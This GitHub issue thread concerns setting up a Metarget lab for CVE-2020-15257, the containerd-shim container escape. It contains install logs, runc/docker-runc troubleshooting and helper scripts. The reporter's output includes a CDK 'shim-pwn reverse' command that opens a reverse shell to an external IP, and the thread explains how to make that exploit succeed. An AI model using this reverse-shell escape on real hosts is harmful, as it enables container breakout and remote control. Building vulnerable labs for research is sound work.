Metarget / metarget

Metarget is a framework providing automatic constructions of vulnerable infrastructures.
Apache License 2.0

Small problem when setting up cve-2020-15257 #74

Closed. duowen1 closed this issue 3 years ago

duowen1 commented 3 years ago

I set up the environment on Ubuntu 18.04 and on 16.04; the final result was the same in both cases, as shown below. The Linux kernel version is 5.8.0-59-generic.

sudo ./metarget cnv install cve-2020-15257 --verbose
cve-2020-15257 is going to be installed
uninstalling current docker gadgets if applicable
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
The following packages will be REMOVED:
  docker-ce
0 upgraded, 0 newly installed, 1 to remove and 444 not upgraded.
After this operation, 181 MB disk space will be freed.
(Reading database ... 133309 files and directories currently installed.)
Removing docker-ce (18.03.1~ce~3-0~ubuntu) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'docker' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'docker-engine' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'docker.io' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'containerd' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'runc' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
installing prerequisites
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease          
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                  
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                   
Hit:5 http://archive.ubuntu.com/ubuntu xenial-updates InRelease                                               
Hit:6 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Hit:7 https://download.docker.com/linux/ubuntu bionic InRelease
Reading package lists... Done         
Reading package lists... Done
Building dependency tree       
Reading state information... Done
ca-certificates is already the newest version (20210119~18.04.1).
software-properties-common is already the newest version (0.96.24.32.14).
apt-transport-https is already the newest version (1.6.13).
gnupg-agent is already the newest version (2.2.4-1ubuntu1.4).
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable
OK
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                     
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                   
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                               
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                             
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                     
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                                             
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                                               
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                                             
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
installing docker-ce with 18.03.1~ce~3-0~ubuntu version
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  docker-ce
0 upgraded, 1 newly installed, 0 to remove and 444 not upgraded.
Need to get 0 B/33.9 MB of archives.
After this operation, 181 MB of additional disk space will be used.
Selecting previously unselected package docker-ce.
(Reading database ... 133095 files and directories currently installed.)
Preparing to unpack .../docker-ce_18.03.1~ce~3-0~ubuntu_amd64.deb ...
Unpacking docker-ce (18.03.1~ce~3-0~ubuntu) ...
Setting up docker-ce (18.03.1~ce~3-0~ubuntu) ...
Processing triggers for ureadahead (0.100.0-21) ...
Processing triggers for systemd (237-3ubuntu10.24) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
warning: no candidate version for containerd
warning: docker seems to be installed, but some errors happened during installation
cve-2020-15257 successfully installed

The installation succeeds, but warnings are shown.

I then followed the writeup to reproduce the vulnerability. The abstract-namespace socket can be found, but running the exploit gives the following result:

root@ubuntu:/tmp# run shim-pwn reverse xx.xx.xx.xx 1234
bash: run: command not found
root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
2021/06/28 07:55:31 tring to spawn shell to 49.232.1.8:1234
2021/06/28 07:55:31 try socket: @/containerd-shim/moby/b2d38375588b3b988f9010ce551d785a2bdb37a497aed068c8482b0776af2910/shim.sock
2021/06/28 07:55:31 rpc error response.:
rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
2021/06/28 07:55:31 exploit failed.

The error says runc is not in $PATH, and running runc prompts me to install it. I found that the runc executable actually installed is docker-runc; after creating a symlink the exploit succeeded.

It seems that if Docker had previously been installed on the system, installing the vulnerable environment with Metarget leads to this runc naming problem. I'm not sure whether this counts as a bug; perhaps a note could be added to the writeup?

brant-ruan commented 3 years ago

  1. The containerd installation failure is reproducible. containerd is currently installed with apt-get; the containerd version available on 16.04 and 18.04 has changed and no longer matches what the cnv defines, so the installation fails. I plan to look for a better way to install containerd, for example installing by version range, or offering several installation methods the way the "switch kernel" part does.
  2. On the runc vs docker-runc question: this may depend on the package versions and OS version? I have not found detailed material on the difference between the two, but what I used before was mostly docker-runc, i.e. the set of docker-prefixed programs that come with Docker. (In fact, the reason your exploit eventually succeeded is also that docker-ce automatically installed docker-containerd, since Metarget's own containerd installation failed.)
  3. The usual call chain is: docker daemon -> containerd -> runc (or docker-runc). After Metarget finishes installing the vulnerability, although the containerd installation failed, Docker works normally, which means Docker can find docker-runc. So I think the exploit failure is because the exploit calls the external runc; if it were changed to docker-runc, it should succeed.
  4. I'll confirm this again and then update the writeup.
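
The two checks behind items 2 and 3 above and the symlink fix from the first post (which shim sockets a host-network process can see, and which runtime binary the shim will actually find through PATH), as an added shell example that is not part of this issue, Metarget or CDK. The /proc/net/unix sample is constructed (one shim path is copied from the issue output, the other rows are made up), and the directory used for the runc symlink is an assumption, since the issue does not say where the link was created:

```shell
#!/bin/sh
# Added example for this thread; not Metarget's or CDK's code.
# Two checks for the situation described above:
#   1. list containerd-shim sockets in the abstract unix-socket namespace, as a
#      process sharing the host network namespace (e.g. a --net=host container)
#      sees them; reaching those sockets is what CVE-2020-15257 hinges on;
#   2. find which OCI runtime binary is resolvable through PATH: the shim execs a
#      plain "runc", so a host that only ships "docker-runc" produces the
#      'executable file not found in $PATH' error from the issue.

# Constructed sample in /proc/net/unix format. The first shim path is the one from
# the issue output; the other rows are made up for the example.
SAMPLE_PROC_NET_UNIX='Num       RefCount Protocol Flags    Type St Inode Path
0000000000000000: 00000002 00000000 00010000 0001 01 18432 /run/systemd/journal/stdout
0000000000000000: 00000002 00000000 00010000 0001 01 21990 @/containerd-shim/moby/b2d38375588b3b988f9010ce551d785a2bdb37a497aed068c8482b0776af2910/shim.sock
0000000000000000: 00000002 00000000 00010000 0001 01 22013 /var/run/docker.sock
0000000000000000: 00000003 00000000 00000000 0001 03 22077
0000000000000000: 00000002 00000000 00010000 0001 01 22100 @/containerd-shim/moby/0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef/shim.sock@'

# list_shim_sockets FILE
# Prints the containerd-shim socket names found in FILE (normally /proc/net/unix).
# Abstract sockets are shown with a leading "@" in place of the NUL byte; a socket
# bound with a length that covers a trailing NUL also shows a trailing "@", which
# is stripped here so the names match what a shim client would dial.
list_shim_sockets() {
    awk 'NR > 1 && $NF ~ /^@\/containerd-shim\// { sub(/@$/, "", $NF); print $NF }' "$1"
}

# find_oci_runtime [PATH_LIST]
# Prints "name=/full/path" for the first of runc, docker-runc found in PATH_LIST
# (default: $PATH), preferring runc because that is the name the shim execs;
# returns 1 if neither exists.
find_oci_runtime() {
    path_list="${1:-$PATH}"
    for name in runc docker-runc; do
        old_ifs="$IFS"; IFS=:
        for dir in $path_list; do
            if [ -x "$dir/$name" ]; then
                IFS="$old_ifs"
                printf '%s=%s\n' "$name" "$dir/$name"
                return 0
            fi
        done
        IFS="$old_ifs"
    done
    return 1
}

# ensure_runc_alias DOCKER_RUNC TARGET_DIR [PATH_LIST]
# If no "runc" resolves through PATH_LIST, links TARGET_DIR/runc -> DOCKER_RUNC.
# This reproduces the symlink fix from the issue; the target directory is an
# assumption (the issue does not say where the link was created).
ensure_runc_alias() {
    docker_runc="$1"; target_dir="$2"
    resolved=$(find_oci_runtime "${3:-$PATH}" || true)
    case "$resolved" in
        runc=*) return 0 ;;   # a plain "runc" is already resolvable, nothing to do
    esac
    [ -x "$docker_runc" ] || { echo "no executable at $docker_runc" >&2; return 1; }
    ln -s "$docker_runc" "$target_dir/runc"
}

# Live run on the host, or inside a container started with --net=host:
#   ./shim_check.sh --live
if [ "${1:-}" = "--live" ]; then
    list_shim_sockets /proc/net/unix
    find_oci_runtime || echo "neither runc nor docker-runc is on PATH" >&2
fi
```

With --live the script lists the shim sockets reachable from the current network namespace and reports which runtime name resolves; if only docker-runc shows up, ensure_runc_alias /usr/bin/docker-runc /usr/local/bin creates the alias the shim is looking for (the /usr/local/bin location is the assumption mentioned above).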

brant-ruan commented 3 years ago

@duowen1 On the runc vs docker-runc question: in my tests, once containerd installs successfully (cnv install cve-2020-15257) both runc and docker-runc are present, at /usr/sbin/runc and /usr/bin/docker-runc respectively, and spawning a reverse shell with CDK works fine on my side.

brant-ruan commented 3 years ago

This issue will be closed. However, the containerd installation problem has not been solved perfectly yet. If necessary, someone may reopen this issue and we will talk and figure out how to solve it :p
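
Since the containerd installation step is what remains unresolved, here is an added shell example (not Metarget's code) of resolving an installable containerd version from apt-cache madison output instead of pinning one exact version in the cnv. The madison lines are constructed with made-up version strings; the package name containerd.io (Docker's apt repository) and GNU sort -V ordering are assumptions. The fixed releases named in the comment, 1.3.9 and 1.4.3, are the ones from the CVE-2020-15257 advisory:

```shell
#!/bin/sh
# Added example, not Metarget's code. Instead of hard-coding one exact containerd
# version (which breaks when the distro repos move on, as in this issue), resolve a
# candidate from "apt-cache madison containerd.io" output.

# Constructed madison-style output; the version strings are made up for the
# example, the line format ("pkg | version | source") is apt-cache's.
SAMPLE_MADISON='containerd.io | 1.4.6-1 | https://download.docker.com/linux/ubuntu bionic/stable amd64 Packages
containerd.io | 1.3.9-1 | https://download.docker.com/linux/ubuntu bionic/stable amd64 Packages
containerd.io | 1.3.7-1 | https://download.docker.com/linux/ubuntu bionic/stable amd64 Packages
containerd.io | 1.2.13-2 | https://download.docker.com/linux/ubuntu bionic/stable amd64 Packages'

# madison_versions [FILE]
# The version column of madison output read from FILE (default: stdin).
madison_versions() {
    awk -F'|' 'NF >= 2 { gsub(/ /, "", $2); print $2 }' "${1:-/dev/stdin}"
}

# pick_version PREFIX [FILE]
# Highest listed version starting with PREFIX, e.g. "1.3." -> 1.3.9-1; returns 1
# if none. Use "1.3." rather than "1.3" so that a 1.30.x would not match.
pick_version() {
    madison_versions "${2:-/dev/stdin}" | awk -v p="$1" 'index($0, p) == 1' |
        sort -V | tail -n 1 | grep .
}

# pick_below CEILING [FILE]
# Highest listed version strictly lower than CEILING (GNU "sort -V" ordering);
# returns 1 if none. For a deliberately vulnerable lab, CEILING is the first fixed
# release: containerd 1.3.9 / 1.4.3 for CVE-2020-15257.
pick_below() {
    ceiling="$1"
    { madison_versions "${2:-/dev/stdin}"; echo "$ceiling"; } | sort -V |
        awk -v c="$ceiling" '$0 == c { exit } { last = $0 } END { if (last == "") exit 1; print last }'
}

# Live use: pick the newest still-vulnerable 1.3.x build and install exactly that.
#   v=$(apt-cache madison containerd.io | pick_below 1.3.9) \
#       && sudo apt-get install -y "containerd.io=$v"
```

Pinning the result with apt-get install containerd.io=VERSION keeps the install reproducible while letting the cnv describe a range rather than one build that may have vanished from the repository.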